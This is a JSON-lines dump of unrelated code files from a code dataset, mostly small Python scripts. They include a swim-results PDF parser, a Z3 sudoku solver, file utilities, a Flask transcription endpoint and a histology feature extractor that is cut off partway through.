+{"seq_id":"161404406","text":"from competition import *\nfrom file_pdf import *\n\n\ndef get_pool(string):\n string = string.split(',')[1]\n start, end = string.index(' ('), string.index('м)')\n return Pool(title=string[1: start + 1], size=string[start + 2: end])\n\ndef get_discipline(string):\n distance, style = string.split('м ')\n return distance, style # {\"discipline\": {\"distance\": distance, \"style\": style}}\n\n\ndef get_result(string, gender):\n\n def clean(string):\n if string[0] in (\"0123456789-– \"):\n string = string[1:]\n return clean(string)\n else:\n return string\n\n def get_time(string):\n if string in (\"дискв\", \"неявка\"):\n return None, string\n else:\n string = string.replace('.', ':')\n string = string.replace(',', '.')\n return string, None\n\n string = clean(string).split(\" \")\n lastname, fistname = string[0].split()\n year_of_birth = string[1].strip()\n club_and_city = string[2].split(\",\")\n if len(club_and_city) == 1:\n club_and_city = club_and_city[0].split(\" \", 1)\n club = club_and_city[0]\n city = club_and_city[1].split()[-1]\n time_res, disqualification = get_time(string[3])\n rang = string[4]\n result = Result(lastname, fistname, year_of_birth, gender, club=club, city=city, time=time_res,\n disqualification=disqualification, rang=rang)\n return result\n\n\ndef parser(file_name):\n pdf = Pdf(file_name)\n content, event = pdf.get_content()\n new_competition, new_pool, distance, style, gender = None, None, None, None, None\n for namb, page in enumerate(content):\n for i, element in enumerate(page):\n if i in (0, 1, 3, 4, 5):\n continue\n elif i == 2:\n new_pool = get_pool(element[4])\n elif i == 6 and element[0] > 200:\n distance, style = get_discipline(element[4])\n elif element[0] > 185 and element[0] < 230:\n if new_competition is not None:\n new_competition.save_json()\n category = element[4]\n if \"Девочки\" in category or \"Девушки\" in category or \"Женщины\" in category or \"Юниорки\" in category:\n gender = \"famale\"\n else:\n gender = \"male\"\n new_competition = Competition(event, new_pool, category, style, distance)\n elif (element[0] > 32.2 and element[0] < 34) or (element[0] > 35 and element[0] < 36): # результаты\n result = get_result(element[4], gender)\n new_competition.add_result(result)\n elif element[0] > 43.4 and element[0] < 43.7 and '\\n' not in element[4]: # результа��ы\n result = get_result(element[4], gender)\n new_competition.add_result(result)\n if namb == 9:\n break\n\n\nif __name__ == \"__main__\":\n parser(\"1.pdf\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"397382513","text":"import networkx\nimport matplotlib.pyplot as plt\nimport warnings\n\nN= networkx.read_edgelist(r\"C:\\Users\\Varsha's PC\\Desktop\\web-google.csv\", delimiter=',', create_using=networkx.Graph())\nprint(networkx.info(N))\nprint(networkx.is_directed(N))\nN=networkx.fast_gnp_random_graph(20,0.5,directed=True)\nnetworkx.draw(N,with_labels=True)\nplt.show()\nprint(networkx.is_directed(N))\nprint(networkx.pagerank(N,alpha = 0.5))\n","sub_path":"Analyze_network.py","file_name":"Analyze_network.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"376173279","text":"from Bio import PDB\nfrom Bio.PDB import PDBParser, PDBIO\nfrom Bio.PDB.Atom import Atom \nfrom Bio.PDB.Residue import Residue\nfrom Bio.PDB.Structure import Structure\n\n#parse structure 1EHZ\nparser = PDBParser()\nstructure_1EHZ = parser.get_structure('1EHZ','1EHZ.pdb')\n\n#create list of atoms not to delete\natoms_not_del = [\n\t'P',\n\t'OP1',\n\t'OP2',\n\t'O5',\n\t'C5',\n\t'C4',\n\t'O4',\n\t'C1',\n\t'C2',\n\t'O2',\n\t'C3', \n\t'O3'\n]\n\n#get all atoms\nall_atoms = structure_1EHZ.get_atoms()\n\n#search for backbone and ribose atoms\nbackbone = []\nfor _atom in all_atoms:\n\tif _atom.get_name() not in atoms_not_del:\n\t\tresidue = _atom.get_parent() #get residue of atom\n\t\tresidue.detach_child(_atom.id) #delete atom from residue\n\n#save new structure to file\nbackbone = PDBIO()\nbackbone.set_structure(structure_1EHZ)\nbackbone.save('1EHZ_backbone.pdb')","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"596331904","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport clipboard\nimport hashlib\nfrom sys import argv\nimport webbrowser\n\ndef hash_data(hashstring, hashfunction, url):\n '''Get the hash of given string.'''\n # Determine if a method for hashfunction\n # exists in hashlib. If no attribute/method is\n # found, default to sha1. \n if hasattr(hashlib, hashfunction):\n hash_method = getattr(hashlib, hashfunction)\n else:\n \thash_method = hashlib.sha1\n \n # Put hash to clipboard, if hashstring exists.\n if hashstring:\n \tclipboard.set(hash_method(hashstring).hexdigest())\n else:\n raise ValueError\n\n # Pythonista doesn't support x-callback.\n # So this is a pragmatic approach to calling\n # another app after hashing the string.\n webbrowser.open(url)\n\ndef parse_input(data):\n '''Parse input from Drafts command-line-like.'''\n parser = argparse.ArgumentParser(description='input a string to hash.')\n\n # Expects strings to hash.\n parser.add_argument('inputstring',\n metavar='STRING',\n nargs='*',\n help='the string to hash')\n \n # Set the hash function.\n parser.add_argument('-hs', '--hs', '-hash', '--hash',\n metavar='HASH-NAME',\n default='sha1',\n dest='hash',\n help='the hash function of hashlib to use. defaults to sha1')\n\n # Intended to set a callback-like action.\n # Use to open a specific app via url scheme, if necessary. Otherwise will open Drafts.\n parser.add_argument('-u', '--u', '-url', '--url',\n metavar='URL',\n default='drafts4://',\n dest='url',\n help='url scheme to call after hashing. use to call an app.')\n\n args = parser.parse_args(data)\n hash_data(' '.join(args.inputstring), args.hash, args.url)\n\nif __name__ == '__main__':\n parse_input(argv[1].split(' '))","sub_path":"drafts/string_hashes.py","file_name":"string_hashes.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"645257117","text":"import serial #Serial imported for Serial communication\nimport time #Required to use delay functions\nimport array\n\narduino = serial.Serial('/dev/ttyUSB0', 9600, timeout=.1) #Create Serial port object called ArduinoUnoSerialData time.sleep(2) #wait for 2 secounds for the communication to get established\ntime.sleep(2) #give the connection a second to settle\nloop = True\nfinger = array.array('i', (0 for i in range(0, 512)))\nwhile(loop):\n arduino.write(\"1\")\n data = arduino.readline()\n data = str(data)\n if (data != 'f'):\n input = arduino.readline()\n while (len(str(input)) < 3):\n input = arduino.readline()\n print(input)\n if (data == 'f'):\n print(\"Failed\")","sub_path":"src/files/examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"364113092","text":"# 系统给一个数字,用户输入猜数字,如果不相等,继续要用户猜\n\nnum=500\ncount=0\nwhile True:\n count+=1\n result=int(input(\"请输入结果:\"))\n\n if result==num:\n print(\"恭喜你,猜对了,答案就是:%d,你猜了%d次\"%(result,count))\n break\n elif result>num:\n print(\"你输入的数字,太大了\")\n else:\n print(\"你输入的数字,太小了\")","sub_path":"StudyPython/Python分支循环-综合案例猜数字.py","file_name":"Python分支循环-综合案例猜数字.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"469476925","text":"import os\n\nimport pytest\n\nfrom technews import mail_util\nfrom technews import TechNews\nfrom technews import EmailContentHelper\n\n\n@pytest.mark.skip(\"skip test email\")\ndef test_send_email_function():\n mh = EmailContentHelper()\n\n samples_list = [\n TechNews(\"orange\").get_news_by_page,\n TechNews(\"ithome\").get_news_by_page,\n TechNews(\"business\").get_news_by_page,\n TechNews(\"inside\").get_news_by_page\n ]\n\n news_rows = \"\"\n for sp_name in samples_list:\n samples = sp_name(2)\n news_rows += mh.get_news_html_contents(samples, samples[\"news_page_title\"])\n\n email_html = mh.get_email_html(\"Test-科技新聞\", news_rows)\n\n mail_util.mail_sender(\n os.environ[\"MAIL_SENDER\"], os.environ[\"MAIL_SENDER_PWD\"],\n os.environ[\"MAIL_RECV\"].split(\",\"), email_html, \"Test-科技新聞\", \"html\")\n\n\n@pytest.mark.skip(\"skip test email force error\")\ndef test_send_email_force_error():\n with pytest.raises(mail_util.SendEmailRetryTimeout):\n mail_util.mail_sender(\"\", \"\", \"\", \"\", \"Test-科技新聞\", \"plain\")\n","sub_path":"tests/test_mail_sender.py","file_name":"test_mail_sender.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"424357877","text":"#########################################\n# base.py\n#\n# Author zrong\n# Creation 2014-09-23\n# Last Editing 2015-01-30\n#########################################\n\n\"\"\"\n.. module:: base\n :platform: Unix, Windows\n :synopsis: 一些通用功能的封装。\n\n.. moduleauthor:: zrong(zengrong.net)\n\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport zipfile\nimport shutil\nimport hashlib\nimport tempfile\nfrom string import Template\nfrom zrong import slog\n\n\nclass DictBase(dict):\n \"\"\"作为配置文件的基类。\n\n dict 默认不适合当作配置文件对象使用。如要有下面几点不便:\n \n #. 对于不存在的 key,会 raise KeyError 错误;\n #. dict不能使用 ``.`` 语法访问。\n\n :class:`DictBase` 解决了这些问题,还另外提供了一些方法在使用上更加方便。\n\n \"\"\" \n\n def __missing__(self, key):\n return None\n\n def __getattr__(self, name):\n return self[name]\n\n def __setattr__(self, name, value):\n self[name] = value\n \n def __delattr__(self, name):\n del self[name]\n\n def copy_from_dict(self, adict, parent=None):\n \"\"\"从一个已经存在的 dict 中复制所有的值。\n\n :param adict: 被复制的 dict。\n :type adict: dict\n :param parent: 复制到哪个父对象。\n 若为 None 则复制到 self 。\n :type parent: DictBase\n\n \"\"\"\n if not parent:\n parent = self\n for k,v in adict.items():\n if isinstance(v, dict):\n vDict = DictBase(v)\n self.copy_from_dict(v, vDict)\n parent[k] = vDict\n else:\n parent[k] = v\n\n def dump(self, human=False):\n \"\"\"将自身内容打印成字符串\n\n :param bool human: 若值为 True ,则打印成易读格式。\n\n \"\"\"\n txt = str(self)\n if human:\n txt = txt.replace(\", '\", \",\\n'\")\n txt = txt.replace(\"{\", \"{\\n\")\n txt = txt.replace(\"}\", \"\\n}\")\n txt = txt.replace(\"[\", \"[\\n\")\n txt = txt.replace(\"]\", \"\\n]\")\n return txt\n\n def save_to_file(self, path, human=True):\n \"\"\"将自身内容保存到文件。\n\n :param str path: 保存的文件路径。\n :param bool human: 参见 :func:`dump()`\n\n \"\"\"\n write_file(path, self.dump(human))\n slog.info(\"Save %a done.\", path)\n\n def read_from_file(self, path):\n \"\"\"从一个文本文件中读入信息。\n 假设该文本文件的格式与 :func:`dump()` 相同。\n\n :param str path: 待读入的文件路径。\n\n \"\"\"\n if not os.path.exists(path):\n slog.warning(\"The file %s is not exist.\", path)\n return False\n txt = read_file(path)\n dic = eval(txt)\n self.copy_from_dict(dic)\n return True\n\n copyFromDict = copy_from_dict\n saveToFile = save_to_file\n readFromFile = read_from_file\n\n\ndef list_dir(sourceDir, include_source=None, include_file=True):\n \"\"\"与 :func:`os.listdir()` 类似,但提供一些筛选功能,且返回生成器对象。\n\n :param str sourceDir: 待处理的文件夹。\n :param bool include_source: 遍历结果中是否包含源文件夹的路径。\n :param bool include_file: 是否包含文件。True 表示返回的内容中既包含文件,又\n 包含文件夹;Flase 代表仅包含文件夹。\n :return: 一个生成器对象。\n\n \"\"\"\n for cur_file in os.listdir(sourceDir):\n if cur_file.lower() == \".ds_store\":\n continue\n pathWithSource = os.path.join(sourceDir, cur_file)\n if include_file or os.path.isdir(pathWithSource):\n if include_source:\n yield pathWithSource\n else:\n yield cur_file\n\ndef copy_dir(sou_dir, dst_dir, del_dst=False, del_subdst=False):\n \"\"\":func:`shutil.copytree()` 也能实现类似功能,\n 但前者要求目标文件夹必须不存在。\n 而 copy_dir 没有这个要求,它可以将 sou_dir 中的文件合并到 dst_dir 中。\n\n :param str sou_dir: 待复制的文件夹;\n :param str dst_dir: 目标文件夹;\n :param bool del_dst: 是否删除目标文件夹。\n :param bool del_subdst: 是否删除目标子文件夹。\n\n \"\"\"\n if del_dst and os.path.isdir(del_dst):\n shutil.rmtree(dst_dir)\n os.makedirs(dst_dir, exist_ok=True)\n for cur_file in list_dir(sou_dir):\n dst_file = os.path.join(dst_dir, cur_file)\n cur_file = os.path.join(sou_dir, cur_file)\n if os.path.isdir(cur_file):\n if del_subdst and os.path.isdir(dst_file):\n shutil.rmtree(dst_file)\n os.makedirs(dst_file, exist_ok=True)\n 
copy_dir(cur_file, dst_file)\n else:\n shutil.copyfile(cur_file, dst_file)\n\ndef get_files(path, ext=[], include=True):\n \"\"\"遍历提供的文件夹的所有子文件夹,饭后生成器对象。\n\n :param str path: 待处理的文件夹。\n :param list ext: 扩展名列表。\n :param bool include: 若值为 True,代表 ext 提供的是包含列表;\n 否则是排除列表。\n :returns: 一个生成器对象。 \n\n \"\"\"\n has_ext = len(ext)>0\n for p, d, fs in os.walk(path):\n for f in fs:\n if has_ext:\n in_ext = False\n for name in ext:\n if f.endswith(name):\n in_ext = True\n break\n if (include and in_ext) or \\\n (not include and not in_ext):\n yield os.path.join(p,f)\n else:\n yield os.path.join(p, f)\n\ndef read_file(file_path):\n \"\"\"读取文本文件的内容。\n\n :param str file_path: 文件路径。\n :returns: 文件内容。\n :rtype: str\n\n \"\"\"\n with open(file_path, mode=\"r\",encoding=\"utf-8\") as afile:\n txt = afile.read()\n return txt\n\ndef write_file(file_path, txt):\n \"\"\"将文本内容写入文件。\n\n :param str file_path: 文件路径。\n :param str txt: 待写入的文件内容。\n\n \"\"\"\n if not os.path.exists(file_path):\n upDir = os.path.dirname(file_path)\n if not os.path.isdir(upDir):\n os.makedirs(upDir)\n\n with open(file_path, mode=\"w\",encoding=\"utf-8\") as afile:\n afile.write(txt)\n\ndef write_by_templ(templ, target, sub_value, safe=False):\n \"\"\"根据模版写入文件。\n\n :param str templ: 模版文件所在路径。\n :param str target: 要写入的文件所在路径。\n :param dict sub_value: 被替换的内容。\n\n \"\"\"\n templ_txt = read_file(templ)\n txt = None\n if safe:\n txt = Template(templ_txt).safe_substitute(sub_value)\n else:\n txt = Template(templ_txt).substitute(sub_value)\n write_file(target, txt)\n\ndef get_md5(path):\n \"\"\"获取文件的 MD5 值。\n\n :param str path: 文件路径。\n :returns: MD5 值。\n :rtype: str\n\n \"\"\"\n with open(path,'rb') as f:\n md5obj = hashlib.md5()\n md5obj.update(f.read())\n return md5obj.hexdigest()\n raise ZrongError(\"Error when get md5 for %s!\"%path)\n\ndef create_zip(files, trim_arcname=None, target_file=None, **zipfile_args):\n \"\"\"创建一个 zip 文件。\n\n :param list files: 要创建zip 的文件列表。\n :param int trim_arcname: 若提供这个值,则使用 ZipFile.write(filename, filename[trim_arcname:]) 进行调用。\n :returns: zip 文件的路径。\n :rtype: str\n\n \"\"\"\n zipname = None\n azip = None\n if not target_file:\n azip = tempfile.NamedTemporaryFile(mode='wb', delete=False)\n zipname = azip.name\n else:\n azip = target_file\n zipname = target_file.name if hasattr(azip, 'read') else azip\n slog.info('Package %d files to \"%s\"'%(len(files), azip.name))\n fileNum = len(files)\n curFile = 0\n zipfile_args['mode'] = 'w'\n if not zipfile_args.get('compression'):\n zipfile_args['compression'] = zipfile.ZIP_DEFLATED\n with zipfile.ZipFile(azip, **zipfile_args) as zipf:\n for f in files:\n percent = round(curFile/fileNum*100)\n sys.stdout.write('\\r%d%%'%(percent))\n sys.stdout.flush()\n zipf.write(f, f[trim_arcname:] if trim_arcname else None )\n curFile = curFile+1\n\n sys.stdout.write('\\r100%\\n')\n sys.stdout.flush()\n\n if hasattr(azip, 'close'):\n azip.close()\n return zipname\n\ndef get_max_ver(fmt, filelist):\n \"\"\"有一堆字符串,文件名均包含 %d.%d.%d 形式版本号,返回其中版本号最大的那个。\n 我一般用它来检测一堆发行版中版本号最大的那个文件。\n\n :param str fmt: 要检测测字符串形式,例如 zrong-%s.tar.gz ,其中 %s 会被正则替换。\n :param list files: 字符串列表。\n :returns: 版本号最大的字符串。\n :rtype: str\n\n \"\"\"\n x, y, z = 0,0,0\n verpat = fmt%'(\\d+).(\\d+).(\\d+)'\n verre = re.compile(r''+verpat+'', re.M) \n for f in filelist:\n match = verre.search(f)\n if match:\n x1 = int(match.group(1))\n y1 = int(match.group(2))\n z1 = int(match.group(3))\n if x1 >= x and y1 >= y:\n x = x1\n y = y1\n z = z1\n verfmt = fmt%('%d.%d.%d')\n name = verfmt%(x, y, z)\n if x == 0 and y == 0 and z == 
0:\n slog.info('Can not find the string \"%s\" !'%name)\n return None\n return name\n\n","sub_path":"zrong/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140411603","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for r18database project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'r18database'\n\nSPIDER_MODULES = ['r18database.spiders']\nNEWSPIDER_MODULE = 'r18database.spiders'\n\nITEM_PIPELINES = {\n\t'scrapy.contrib.pipeline.images.ImagesPipeline': 1,\n#\t'r18database.mongo_pipeline}.MongoDBPipeline': 2,\n}\n\nIMAGES_STORE = 'E:\\Scrapy Download Data\\R18Database\\images'\nIMAGES_THUMBS = {\n\t'small': (50, 50),\n\t'big': (270, 270),\n}\n\n'''DOWNLOADER_MIDDLEWARES = {\n 'scrapy.contrib.downloadermiddleware.httpproxy.HttpProxyMiddleware': 110,\n}'''\n\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/536.5'\nCOOKIES_ENABLED = True\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'r18database (+http://www.yourdomain.com)'\n","sub_path":"r18database/r18database/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"103370435","text":"import sys\nfrom itertools import combinations\nfrom z3 import *\n\n#Paste sudoku board here:\nsudokuInput = [ [6, 0, 0, 0, 8, 0, 0, 0, 1] , [0, 3, 0, 7, 0, 0, 6, 0, 0] , [0, 0, 0, 0, 1, 0, 0, 0, 7] , [0, 5, 0, 0, 3, 8, 4, 0, 0] , [3, 0, 0, 0, 4, 0, 0, 0, 0] , [0, 0, 4, 0, 0, 0, 0, 5, 3] , [0, 1, 0, 0, 0, 3, 0, 6, 0] , [0, 0, 3, 9, 0, 0, 0, 8, 5] , [9, 2, 8, 1, 0, 0, 3, 0, 0] ]\n\n#Checks that the input of the sudoku board is formatted properly with correct values 1-9\nif (len(sudokuInput) != 9):\n print('Invalid Sudoku input')\n sys.exit()\nfor row in sudokuInput:\n if(len(row) != 9):\n print('Invalid Sudoku input')\n sys.exit()\n for value in row:\n if(value < 0 or value > 9):\n print('Value in sudoku board is not within integer range 1-9!')\n sys.exit()\n\n\n# Creates z3 solver and holder with variables for Z3 to solve (solves all the 0 zero spaces on board)\nmySolver = Solver()\n\nz3Variables = [[] for i in range(9)]\nfor i in range(9):\n z3Variables[i] = Ints(\"X%s%s\" % (i,j) for j in range(9))\n\n\n\n# Initializes the z3 variables to either the board value, or sets the solver constraint for the unkown variable from 1-9\nfor i in range(len(sudokuInput)):\n for j in range(len(sudokuInput[i])):\n\n # Values of 0 represent unkown value, whereas anything else is already known\n if sudokuInput[i][j] != 0:\n mySolver.add(z3Variables[i][j] == sudokuInput[i][j])\n else:\n mySolver.add(z3Variables[i][j] >= 1)\n mySolver.add(z3Variables[i][j] <= 9)\n\n# Defines the rows within our board and adds constraints to Z3 solver:\nfor row in z3Variables:\n #Checks uniqueness of values in each row (makes sure 1-9 is only used once per row)\n for vals in combinations(row, 2):\n x, y = list(vals)\n mySolver.add(x != y)\n\n #Adds Z3 solver constraint that states the sum of row values should add to 45 (1+2+3+ ... + 9 = 45)\n mySolver.add(sum(row) == 45)\n\n# Defines the columns within our board and adds constraints to the Z3 solver: \nfor j in range(9):\n columnValues = []\n for i in range(9):\n columnValues.append(z3Variables[i][j])\n\n for vals in combinations(columnValues, 2):\n x, y = list(vals)\n mySolver.add(x != y)\n\n #Adds Z3 solver constraint that states the sum of row values should add to 45 (1+2+3+ ... + 9 = 45)\n mySolver.add(sum(columnValues) == 45)\n\n# Defines the 3x3 grids within our 9x9 board and adds constraints to Z3 solver:\nfor i in range(0, 9, 3): \n for j in range(0, 9, 3):\n gridValues = []\n\n for x in range(i, i + 3):\n for y in range(j, j + 3):\n gridValues.append(z3Variables[x][y])\n\n #Checks uniqueness of values in grid (makes sure 1-9 is only used once per grid)\n for vals in combinations(gridValues, 2):\n x, y = list(vals)\n mySolver.add(x != y)\n\n #Adds Z3 solver constraint that states the sum of grid values should add to 45 (1+2+3+ ... + 9 = 45)\n mySolver.add(sum(gridValues) == 45)\n\nresult = mySolver.check()\nif result == sat:\n model = mySolver.model()\n solvedSudoku = sudokuInput\n print(\"Solved Sudoku:\")\n for i in range(9):\n for j in range(9):\n if solvedSudoku[i][j] == 0:\n solvedSudoku[i][j] = model[z3Variables[i][j]]\n\n for row in solvedSudoku:\n print(row)\n\nelse:\n print('Cannot solve this Sudoku Puzzle!')\n\n\n","sub_path":"sudokuZ3Solver.py","file_name":"sudokuZ3Solver.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"447931331","text":"#!/usr/bin/env python3\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser(\n description=\"This is a python3 script to\\\n automatic copy the template file, \\\n run simulation and analysis\")\nparser.add_argument(\"template\", help=\"the name of template file\")\nargs = parser.parse_args()\nprotein_name = args.template.strip('/')\nn = 20\ncal = \"~/opt/myCalcQValue_multi.py\"\n\nos.system(\"cp ~/opt/AAWSEM/\"+protein_name+\".pdb .\")\nos.system(\"python2 \"+cal+\" \"+protein_name+\".pdb dump.lammpstrj qw 0\")\nos.system(\"python2 \"+cal+\" \"+protein_name+\".pdb dump.lammpstrj qo 1\")\nos.system(\"python2 ~/opt/script/BuildAllAtomsFromLammps_seq.py dump.lammpstrj movie \"+protein_name+\".seq\")\n","sub_path":"AAWSEM/aawsem_cal.py","file_name":"aawsem_cal.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"47518054","text":"#encoding:utf-8\nfrom django.db import models\nfrom datetime import datetime\nclass Customer(models.Model):\n\tuserName=models.CharField(max_length=20,primary_key=True)\n\tdineName=models.CharField('饭店名',max_length=30)\n\taddress=models.CharField('饭店地址',max_length=100,default=' ')\n\tcontactQQ=models.CharField(max_length=20,blank=True)\n\tcontactWC=models.CharField(max_length=20,blank=True)\n\tcontactPhone=models.CharField(max_length=20,blank=True)\n\tphone=models.CharField(max_length=11,default=' ')\n\ttableNumber=models.PositiveSmallIntegerField(default=0)\n\tclass Meta:\n\t\tverbose_name='商户'\n\t\tverbose_name_plural='商户'\n\tdef __unicode__(self):\n\t\treturn self.userName\nclass Menu(models.Model): \n\tFOODTYPE=(\n\t\t('hotDishes','热菜'),\n\t\t('coldDishes','凉菜'),\n\t\t('soup','汤羹'),\n\t\t('stapleFood','主食'),\n\t\t('drinks','酒水'),\n\t)\n\ttypeDic={\n\t\t'hotDishes':'热菜',\n\t\t'coldDishes':'凉菜',\n\t\t'soup':'汤羹',\n\t\t'stapleFood':'主食',\n\t\t'drinks':'酒水'}\n\tfoodName=models.CharField('菜名',max_length=30)\n\tfoodType=models.CharField(max_length=20,default='hotDishes',choices=FOODTYPE)\n\tfoodId=models.CharField(max_length=20,blank=True)\n\tisHot=models.BooleanField(default=False)\n\tisDaily=models.BooleanField(default=False)\n\tfoodPrice=models.FloatField('价格',default=0)\n\towner=models.ForeignKey(Customer)\n\tfavor=models.PositiveSmallIntegerField('喜爱程度',default=0)\n\tclass Meta:\n\t\tverbose_name='菜品'\n\t\tverbose_name_plural='菜品'\n\tdef __unicode__(self):\n\t\treturn self.foodName\nclass Order(models.Model):\n\torderId=models.CharField(max_length=50,primary_key=True)\n\torderTime=models.DateTimeField(blank=True)\n\towner=models.ForeignKey(Customer)\n\tstate=models.SmallIntegerField(blank=True)\n\tcontent=models.TextField()\n\tseatNum=models.SmallIntegerField(default=0)\n\ttotal=models.CharField(max_length=30,default=\"0\")\n\tclass Meta:\n\t\tverbose_name='订单'\n\t\tverbose_name_plural='订单'\nclass SeatRealTime(models.Model):\n\towner=models.ForeignKey(Customer)\n\torder=models.ForeignKey(Order,null=True,blank=True,on_delete=models.SET_NULL)\n\tseatNum=models.SmallIntegerField(default=0)\n\tstate=models.SmallIntegerField(default=0)\t\n\tisPushed=models.BooleanField(default=False)\n\tphone=models.CharField(max_length=11,blank=True)\n\tclass Meta:\n\t\tverbose_name='桌台'\n\t\tverbose_name_plural='桌台'\n","sub_path":"menuManage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"38599623","text":"from flask import Blueprint, request\n\nimport voice_to_text\n\ntranscribe_blueprint = Blueprint('root', __name__)\n\n\n@transcribe_blueprint.route(\"/transcribe\", methods=[\"GET\"])\ndef root_get():\n return \"\"\"Please send a post request instead. We need an audio file. You can send the request like this:\n import requests\n file = FileStorage(\n stream=open(\"audio_file.wav\", \"rb\", buffering=0),\n filename=\"audio_file.wav\",\n content_type=\"audio/wav\",\n )\n data = {\"audio_file\": file}\n result = requests.post(url, data=data)\"\"\"\n\n\n@transcribe_blueprint.route(\"/transcribe\", methods=[\"POST\"])\ndef root_post():\n print(request.files)\n print(request)\n if \"audio_file\" in request.files.keys():\n print(\"got here\")\n file = request.files['audio_file']\n text = voice_to_text.transcribe_audio(file, \"sphinx\")\n print(text)\n return '{{\"text\":\"{text}\",\"Code\":0}}'.format(text=text)\n else:\n return '{\"text\":\"No audio file received :(\",\"Code\":-1}'\n\n\n@transcribe_blueprint.route(\"/\", methods=[\"GET\"])\ndef rroot_get():\n\treturn \"You are probably looking for /transcribe\"\n","sub_path":"server/transcribe_blueprint.py","file_name":"transcribe_blueprint.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"575243909","text":"import skimage.io\nimport pandas as pd\nimport openslide\nimport sys\nimport os\nimport logging\nimport heapq\nimport numpy as np\nfrom tqdm import trange\nimport histomicstk as htk\nimport scipy as sp\nimport concurrent.futures\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, Value\nimport time\nimport pickle\n\nLOG_FILENAME = 'failed_files.log'\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename=LOG_FILENAME,\n filemode='w')\n\nargnum = len(sys.argv)\nif argnum != 2:\n sys.exit('wrong number of arguments:' + str(len(sys.argv))+'. Please enter a tumor type (gbm or lgg)')\ntumor_type = sys.argv[1]\nif tumor_type != \"gbm\" and tumor_type != \"lgg\":\n sys.exit(\"Wrong type. Please enter a tumor type (gbm or lgg)\")\n\nin_path = \"../tcga/dense/\" + tumor_type + \"/\"\nout_path = \"../tcga/\" + \"dense_features/\" + tumor_type + \"/\"\n\nimages = [in_path + imname for imname in os.listdir(in_path)]\n\ndef getPatName(filename):\n #pat_name = 'TCGA-02-0329'\n return filename.split(tumor_type+\"/\")[1][:len('TCGA-CS-4938')]\ndef getImageID(filename):\n return getPatName(filename) + filename[-5] # -1 g -2 n -3 p -4 . -5 number!\n\n#adapted from the ipynb example from HistomicsTK\ndef extractImageFeatures(filename):\n im_input = skimage.io.imread(filename)[:, :, :3]\n original_name = filename.split(\"_\")[0]\n \n ref_image_file = (original_name + \"_0.png\") #normalize image to random set from larger image\n\n im_reference = skimage.io.imread(ref_image_file)[:, :, :3]\n\n # get mean and stddev of reference image in lab space\n mean_ref, std_ref = htk.preprocessing.color_conversion.lab_mean_std(im_reference)\n\n # perform reinhard color normalization\n im_nmzd = htk.preprocessing.color_normalization.reinhard(im_input, mean_ref, std_ref)\n\n # create stain to color map\n stainColorMap = {\n 'hematoxylin': [0.65, 0.70, 0.29],\n 'eosin': [0.07, 0.99, 0.11],\n 'dab': [0.27, 0.57, 0.78],\n 'null': [0.0, 0.0, 0.0]\n }\n\n # specify stains of input image\n stain_1 = 'hematoxylin' # nuclei stain\n stain_2 = 'eosin' # cytoplasm stain\n stain_3 = 'null' # set to null of input contains only two stains\n\n # create stain matrix\n W = np.array([stainColorMap[stain_1],\n stainColorMap[stain_2],\n stainColorMap[stain_3]]).T\n\n # perform standard color deconvolution\n im_stains = htk.preprocessing.color_deconvolution.color_deconvolution(im_input, W).Stains\n\n # get nuclei/hematoxylin channel\n im_nuclei_stain = im_stains[:, :, 0]\n\n # segment foreground\n foreground_threshold = 60\n\n im_fgnd_mask = sp.ndimage.morphology.binary_fill_holes(\n im_nuclei_stain < foreground_threshold)\n\n # run adaptive multi-scale LoG filter\n min_radius = 5\n max_radius = 15\n\n im_log_max, im_sigma_max = htk.filters.shape.cdog(\n im_nuclei_stain, im_fgnd_mask,\n sigma_min=min_radius * np.sqrt(2),\n sigma_max=max_radius * np.sqrt(2)\n )\n\n # detect and segment nuclei using local maximum clustering\n local_max_search_radius = 10\n\n im_nuclei_seg_mask, seeds, 